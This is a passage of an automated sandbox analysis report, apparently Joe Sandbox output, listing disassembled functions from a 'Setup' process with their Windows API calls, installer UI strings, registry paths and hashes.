                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConvertDescriptorProcessSecurityString$CloseCurrentFreeHandleLocalOpenToken_vsnwprintfmalloc
                                                                                              • String ID: (A;OICI;GA;;;LS)$O:%sD:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)$O:%sD:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GA;;;%s)
                                                                                              • API String ID: 4054149472-2141982788
                                                                                              • Opcode ID: e6cb98ae33c3581deef4161e0ff838f5fc124da2c0c5de27243d4cccc1f2a8c9
                                                                                              • Instruction ID: 516bdfbb87e859bed0bdfd47ba21aabbb938cd4ac842a3c6f9c20efe70356ff8
                                                                                              • Opcode Fuzzy Hash: e6cb98ae33c3581deef4161e0ff838f5fc124da2c0c5de27243d4cccc1f2a8c9
                                                                                              • Instruction Fuzzy Hash: A7410531502344FBDB05AE5C8C81FAE3BAAAF8134CF224469F420A5E90C731E945CB5C
                                                                                              Function 63961B2E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63961B35
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00000004,639585F7,00000000,639598A4), ref: 63961B89
                                                                                              • __EH_prolog3.LIBCMT ref: 63961B9C
                                                                                              • _memset.LIBCMT ref: 63961BB9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ExceptionRaise_memset
                                                                                              • String ID: IDS_IS_REALLY_CANCEL
                                                                                              • API String ID: 1117901877-1805271499
                                                                                              • Opcode ID: e6f021ec39099dbc48cdbc0b6a533bebbf9e7984c7f386928094ab04fb10c870
                                                                                              • Instruction ID: 4950e4dd5441ff98aed2273dc65b70df74028a07e436311ddb6b32b64d7b7e30
                                                                                              • Opcode Fuzzy Hash: e6f021ec39099dbc48cdbc0b6a533bebbf9e7984c7f386928094ab04fb10c870
                                                                                              • Instruction Fuzzy Hash: 5141F1B16017058FEB20DF68C984B4ABBF0FF5AB04F40495DE58A9B691DB70E905CF91
                                                                                              Function 6395396A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 118COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63953971
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 63953654: __EH_prolog3.LIBCMT ref: 6395365B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: BackButton$CancelButton$FinishButton$NextButton
                                                                                              • API String ID: 431132790-22014311
                                                                                              • Opcode ID: b92179eebabfceb0df2547b4fbd69276663f956c8d577eb578df847e5c91c8dd
                                                                                              • Instruction ID: 6a5dfbf180b64507e916109b6ba2f29e36bd57ce2b6df8e3443f298a62b8adfc
                                                                                              • Opcode Fuzzy Hash: b92179eebabfceb0df2547b4fbd69276663f956c8d577eb578df847e5c91c8dd
                                                                                              • Instruction Fuzzy Hash: 54414BB1901248EFEB01DBE8C984BDEB7BC6F29A18F184199F014E7282C775DA44CB71
                                                                                              Function 6394F2BE Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394F2C5
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394F20C: __EH_prolog3.LIBCMT ref: 6394F213
                                                                                                • Part of subcall function 639683FD: _memcpy_s.LIBCMT ref: 6396844E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$_memcpy_s
                                                                                              • String ID: IDS_IS_BACK$IDS_IS_CANCEL$IDS_IS_FINISH$IDS_IS_NEXT
                                                                                              • API String ID: 1663610674-2063768433
                                                                                              • Opcode ID: edbd8a245f61275ce59c2c2fdd7ba61f846f48b8cf237cdb6dcb1935c791e260
                                                                                              • Instruction ID: 6445b868524587469fd8008b9e967abdacada63ceece93ef68aba7adfd327c4d
                                                                                              • Opcode Fuzzy Hash: edbd8a245f61275ce59c2c2fdd7ba61f846f48b8cf237cdb6dcb1935c791e260
                                                                                              • Instruction Fuzzy Hash: 004184B29012199FDB04CFACC944AAE77F4AF69718F540598F555EB381CB30DA048FA2
                                                                                              Function 6C5D19F5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105sleepthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DisableThreadLibraryCalls.KERNEL32(?,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D19CE
                                                                                              • InterlockedCompareExchange.KERNEL32(6C5F0164,?,00000000), ref: 6C5D1AB1
                                                                                              • _initterm.MSVCRT ref: 6C5D1AF8
                                                                                              • InterlockedExchange.KERNEL32(6C5F0164,00000000), ref: 6C5D1B0E
                                                                                              • InterlockedCompareExchange.KERNEL32(6C5F0164,00000001,00000000), ref: 6C5D1D46
                                                                                              • free.MSVCRT ref: 6C5D1D7A
                                                                                              • InterlockedExchange.KERNEL32(6C5F0164,00000000), ref: 6C5D1D9C
                                                                                              • Sleep.KERNEL32(000003E8,?,00000000,?,?,6C5D1DDB,?,00000001,?,?,?,?,6C5D1C70,0000002C), ref: 6C5E451B
                                                                                              Strings
                                                                                              • Microsoft\Windows\SoftwareQualityMetricsClient, xrefs: 6C5D19AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExchangeInterlocked$Compare$CallsDisableLibrarySleepThread_inittermfree
                                                                                              • String ID: Microsoft\Windows\SoftwareQualityMetricsClient
                                                                                              • API String ID: 529680579-2483579846
                                                                                              • Opcode ID: 8da0f8aaacb3f5a78abddea76220f9da7658cd12d24a084addf3ebcfde00c3e8
                                                                                              • Instruction ID: 175fa7bfa395d16a5c5646a11f445b3cf0e49197632a060c6c0701a65e75389d
                                                                                              • Opcode Fuzzy Hash: 8da0f8aaacb3f5a78abddea76220f9da7658cd12d24a084addf3ebcfde00c3e8
                                                                                              • Instruction Fuzzy Hash: 853100B220D3C0AFDB01DB699C54E967B75AB4232C71A819FE452CB953E724E802CB5D
                                                                                              Function 6C5E785F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,00000000,00000000,00000000,-00020005,?,00000000,00000000,80000002,Software\Microsoft\SQMClient\Windows,CabSessionAfterSize,?,?,6C5E6078,80000002), ref: 6C5E78BB
                                                                                              • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?,6C5E6078,80000002,Software\Microsoft\SQMClient\Windows,00000000,CEIPEnable,00000000,80000002,Software\Microsoft\SQMClient\Windows\DisabledSessions), ref: 6C5E78F3
                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,6C5E6078,80000002,Software\Microsoft\SQMClient\Windows,00000000,CEIPEnable,00000000,80000002,Software\Microsoft\SQMClient\Windows\DisabledSessions,80000002,Software\Microsoft\SQMClient\Windows\Users,80000002,Software\Microsoft\SQMClient\Windows\Uploader\PendingUpload,80000002), ref: 6C5E792D
                                                                                              Strings
                                                                                              • CabSessionAfterSize, xrefs: 6C5E7868
                                                                                              • Software\Microsoft\SQMClient\Windows, xrefs: 6C5E7869
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              • String ID: CabSessionAfterSize$Software\Microsoft\SQMClient\Windows
                                                                                              • API String ID: 1818849710-2962713777
                                                                                              • Opcode ID: c9954549411998ef8ac64acc3e97a518c719cba69a7859ec64afbb683645be78
                                                                                              • Instruction ID: 20349a79099601c4ef44f4715450bb8da8c440faa8fa62190bf49ea86a921ceb
                                                                                              • Opcode Fuzzy Hash: c9954549411998ef8ac64acc3e97a518c719cba69a7859ec64afbb683645be78
                                                                                              • Instruction Fuzzy Hash: 1931F531641284BBCB159E14DC84F9B3BBAEF8E799F610185F924D79A2D371CC44DBA0
                                                                                              Function 6C5E5DAA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LocalAlloc.KERNEL32(?,00000000), ref: 6C5E5E3B
                                                                                              • memcpy.MSVCRT(?,00000000,-0000000E), ref: 6C5E5E66
                                                                                              • TraceEvent.ADVAPI32(?,?,?), ref: 6C5E5E9E
                                                                                              • LocalFree.KERNEL32(00000000), ref: 6C5E5EAD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Local$AllocEventFreeTracememcpy
                                                                                              • String ID: P
                                                                                              • API String ID: 4064889523-3110715001
                                                                                              • Opcode ID: 70bd200aa761484e12ccc65f34ef92857f5d110ab56da3cce708596ac8eb2e83
                                                                                              • Instruction ID: 279bbe9fcf9b49ff054fc81b8d23e6c18e331ead8d30e80bde61e5e68a2beb11
                                                                                              • Opcode Fuzzy Hash: 70bd200aa761484e12ccc65f34ef92857f5d110ab56da3cce708596ac8eb2e83
                                                                                              • Instruction Fuzzy Hash: 1D3169B1D05218DFEB10CFA9CD8078EB7B6FF89318F6480A9E418A7610D330AA44CF51
                                                                                              Function 639673D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • QueryServiceStatus failed with error: %u, xrefs: 6396749F
                                                                                              • OpenService failed with error: %u, xrefs: 63967438
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$H_prolog3_
                                                                                              • String ID: OpenService failed with error: %u$QueryServiceStatus failed with error: %u
                                                                                              • API String ID: 3339191932-3526490536
                                                                                              • Opcode ID: 08837343624f5fc3470e98f3438cd842828496ade1ef1e8e7410a3ad7f0eb76c
                                                                                              • Instruction ID: f9897a8ab4984af9d36216d3f44ed537808a3dd304190d8927823552503bb4cb
                                                                                              • Opcode Fuzzy Hash: 08837343624f5fc3470e98f3438cd842828496ade1ef1e8e7410a3ad7f0eb76c
                                                                                              • Instruction Fuzzy Hash: EA31D576A153059FE7209F68C888B6A7BF6FF46B24F148438F545EB291CB75D8008F21
                                                                                              Function 63951310 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • Completed, xrefs: 63951348, 6395134D
                                                                                              • Unexpected behavior: AffectedProducts::ComputeAffectedProductsList() method called when computation state is %s, xrefs: 63951351
                                                                                              • NotStarted, xrefs: 6395133E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8H_prolog3Throw
                                                                                              • String ID: Completed$NotStarted$Unexpected behavior: AffectedProducts::ComputeAffectedProductsList() method called when computation state is %s
                                                                                              • API String ID: 3670251406-2979706164
                                                                                              • Opcode ID: f94b2ae38d93e6b3d47dfbb3deac3244974cef3f1200e92100aa7a0b5bea5a12
                                                                                              • Instruction ID: d065f1353eb539718c5df3c2a0b027cda896afac9b003d02338b63f0ca25828f
                                                                                              • Opcode Fuzzy Hash: f94b2ae38d93e6b3d47dfbb3deac3244974cef3f1200e92100aa7a0b5bea5a12
                                                                                              • Instruction Fuzzy Hash: F2319271500704DFCF20CFA5C444AAAB7F8BF1AB18F14095DE5529B2A2DB35E988CF51
                                                                                              Function 63967FA1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63967FA8
                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,?,?,?,00000000,00000000,00000008,6394C9AE,?,00000000,?), ref: 63967FDB
                                                                                              • LocalFree.KERNEL32(?,?,?), ref: 63968004
                                                                                                • Part of subcall function 639683CE: __CxxThrowException@8.LIBCMT ref: 639683E2
                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 6396806E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$Exception@8FormatH_prolog3LocalMessageStringThrow
                                                                                              • String ID: HRESULT 0x%8.8x
                                                                                              • API String ID: 3624661282-2887418326
                                                                                              • Opcode ID: fcfe9d3cebb4f251ae1051576b09029c28527c81762b3c2334129c0b9e7cae3c
                                                                                              • Instruction ID: 42d8ea6b19f09b9e97bf2d227668eb46d397b3d84068fab72e33cf1ce4b2e253
                                                                                              • Opcode Fuzzy Hash: fcfe9d3cebb4f251ae1051576b09029c28527c81762b3c2334129c0b9e7cae3c
                                                                                              • Instruction Fuzzy Hash: 31219F3550A70AEBEF289F55CC44D9EBB7AFF97B44B008819F8256A151CB31C510CF11
                                                                                              Function 6396127A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63961281
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 63961360: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,Action,6397FE10,?,?,?,205ABF9D,Action,?,00000000), ref: 63961395
                                                                                                • Part of subcall function 63961360: GetLastError.KERNEL32(?,?,?,205ABF9D,Action,?,00000000), ref: 639613A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DiskErrorFreeLastSpace
                                                                                              • String ID: complete$Action$Disk space check for items being downloaded$Drive:[%s] Bytes Needed:[%I64u] Bytes Available:[%I64u]
                                                                                              • API String ID: 2933164920-3673225344
                                                                                              • Opcode ID: 85138fc713d2fdd1f3b77568753ed323eaa1349ffbb24ef380c23a9769643042
                                                                                              • Instruction ID: 9291c87f04874d29856b22c6bb6e11aadaf0c1b282dc4a16cffe68145440b6a2
                                                                                              • Opcode Fuzzy Hash: 85138fc713d2fdd1f3b77568753ed323eaa1349ffbb24ef380c23a9769643042
                                                                                              • Instruction Fuzzy Hash: A3216B72901219DFDF00EFA8C844BEEBBB5AF5AB14F584459E115EB282C730DA14DF62
                                                                                              Function 6395D073 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395D07A
                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 6395D130
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              Strings
                                                                                              • IDS_INSTALL_ABORTED_DESCRIPTION_FORMAT_1S, xrefs: 6395D0BF
                                                                                              • IDS_SUCCESS_BLOCKERS_DESCRIPTION_TEXT, xrefs: 6395D0A3
                                                                                              • IDS_INSTALL_WARNING_DESCRIPTION_FORMAT, xrefs: 6395D0F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ItemText
                                                                                              • String ID: IDS_INSTALL_ABORTED_DESCRIPTION_FORMAT_1S$IDS_INSTALL_WARNING_DESCRIPTION_FORMAT$IDS_SUCCESS_BLOCKERS_DESCRIPTION_TEXT
                                                                                              • API String ID: 2878149499-3033223209
                                                                                              • Opcode ID: bc6bcaefb28f6e77262709e1b32360070adea1804f2d481aeb3d797d03558286
                                                                                              • Instruction ID: 02ff8d9f88e32679ee25788005365ea21f07697eb3d4bdc97996ec6cbfc339d1
                                                                                              • Opcode Fuzzy Hash: bc6bcaefb28f6e77262709e1b32360070adea1804f2d481aeb3d797d03558286
                                                                                              • Instruction Fuzzy Hash: 88219071904209DFDB10EBB4C548A9EBBF5BF4AB18F184458F056AB291DB31E954CF11
                                                                                              Function 6395CFA5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395CFAC
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • GetDlgItem.USER32(?,00000067), ref: 6395D018
                                                                                                • Part of subcall function 6394E2E1: GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 6394E319
                                                                                                • Part of subcall function 6394E2E1: FlushInstructionCache.KERNEL32(00000000), ref: 6394E320
                                                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 6395D041
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 6395D05A
                                                                                              Strings
                                                                                              • IDS_BLOCK_DIALOGS_SYSLINK_TEXT, xrefs: 6395CFB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3Item$CacheCurrentFlushInstructionLongProcessTextWindow
                                                                                              • String ID: IDS_BLOCK_DIALOGS_SYSLINK_TEXT
                                                                                              • API String ID: 2244164258-355004722
                                                                                              • Opcode ID: 222046a7b05df7e3eca5c6f39de4ef35d6e315086bcd81161e547b85a0c3da4a
                                                                                              • Instruction ID: e1a6ae688327f3ee0febf95022bcbfd45c2a34888bbab6e1de6eba03c762dcfb
                                                                                              • Opcode Fuzzy Hash: 222046a7b05df7e3eca5c6f39de4ef35d6e315086bcd81161e547b85a0c3da4a
                                                                                              • Instruction Fuzzy Hash: A6218E71900205DFDF10EFA4C948AAEBBF5BF06718F144558E455EB2A1D731D914CF50
                                                                                              Function 6395D2BF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395D2C6
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • SetDlgItemTextW.USER32(?,0000000B,00000000), ref: 6395D2FC
                                                                                              • SetDlgItemTextW.USER32(?,00000008,00000000), ref: 6395D33B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3ItemText
                                                                                              • String ID: IDS_CLOSE$IDS_CONTINUE
                                                                                              • API String ID: 2008326593-3637486705
                                                                                              • Opcode ID: daf792ecef3e1f906cc03e92bf801d8545fcb759406b581f05be945cada6b9e5
                                                                                              • Instruction ID: f3c1a72dcd2c7ff84f1e01e4fc1e8a0176cc5fbb79a02abf9cb26da76cc61101
                                                                                              • Opcode Fuzzy Hash: daf792ecef3e1f906cc03e92bf801d8545fcb759406b581f05be945cada6b9e5
                                                                                              • Instruction Fuzzy Hash: 06113C71A006059FCB14DBE8C988AAEB7F1BF5AB18F144298F115EB2E1CB31E904CF11
                                                                                              Function 6C5EA94E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
